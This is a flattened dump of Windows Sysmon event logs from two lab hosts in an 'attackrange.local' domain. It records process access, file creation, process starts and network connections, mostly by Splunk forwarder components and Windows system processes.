09:27:31.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057673Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.674{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057672Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.674{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8E83-6151-D600-00000000FD01}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057671Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.674{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E83-6151-D600-00000000FD01}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057670Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.675{5EBD8912-8E83-6151-D600-00000000FD01}5908C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001057669Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.424{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87A1F0B49F51A243A50D47DFC610910C,SHA256=232B04D35AB70CF6A2E6E9FC6455D0AD94744F9187BF9A3DDDBA9BAE85EA8EE6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982073Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:28.843{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59584-false10.0.1.12-8000- 23542300x8000000000000000982072Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:31.301{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=19FFBBC175C1BC8EBF6F3C8F29C66C4E,SHA256=1FF698E7D912EE3BDC6A69661D40587FEA37334EDA62DC6DAABDCDB9EBB74F51,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057668Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.660{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54308-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001057667Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.660{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54308-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001057666Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:29.156{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54307-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001057665Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.018{5EBD8912-8E82-6151-D500-00000000FD01}47965232C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000982075Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:32.676{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=E0F718ADD2253ED78F115D673BDE17E6,SHA256=CEBAF51160E873504EE2535D7060E6ECBF3408625D7EB3A3C9DA10883C90A6C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982074Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:32.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34AFE951268926B87CDC5DCA74B01661,SHA256=09D53AF15E86E8EF0FF6C48C0E23BA40DD69CFF199C687881BAA4E171193A327,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057679Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:32.424{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EAAB50FB24B09A9798C8C33BFEDBD73,SHA256=A166BF3AEA3F35342A171ED2DD60698F0707BAEF2FD2E157DC435F0897676DA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982076Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:33.629{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F348FF6502B31A3D2C5A43F24CE6C886,SHA256=FA53607CFACAB0E229F273309AA31E8B1C437C59FF82D100E3B909DC66B946D9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057697Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.502{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62f15|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057696Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.502{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e2e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057695Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.502{5EBD8912-8D2A-6151-9600-00000000FD01}46324940C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62df7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+1544df|C:\Windows\System32\windows.storage.dll+15325f|C:\Windows\System32\windows.storage.dll+15620f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057694Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.487{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6162f|C:\Windows\System32\SHELL32.dll+62890|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057693Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.487{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+6284c|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057692Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.487{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057691Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.487{5EBD8912-8D2A-6151-9600-00000000FD01}46324904C:\Windows\Explorer.EXE{5EBD8912-8D80-6151-AF00-00000000FD01}5156C:\Windows\regedit.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057690Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.440{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=559E04819CBE4BC89EB638FC63F83B94,SHA256=F80C37AA96F30404571086767D73BA165EEF7AD238561EC3ACFCA275B4C9C6B8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057689Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.393{5EBD8912-8E85-6151-D700-00000000FD01}53845952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057688Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.174{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E85-6151-D700-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057687Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.174{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057686Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.174{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057685Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.174{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057684Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.174{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057683Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.174{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8E85-6151-D700-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001057682Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.174{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8E85-6151-D700-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001057681Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:33.175{5EBD8912-8E85-6151-D700-00000000FD01}5384C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001057680Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:31.113{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50999-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000982080Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:27:34.863{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DEE8FE0AB644EE3698DC2DE8AF575031,SHA256=D18BAF9DCEF2AD111693252A11314AFC28BB55CAE569E1B0F6890B1D520F0D3E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.924{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8E86-6151-D900-00000000FD01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:27:34.924{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W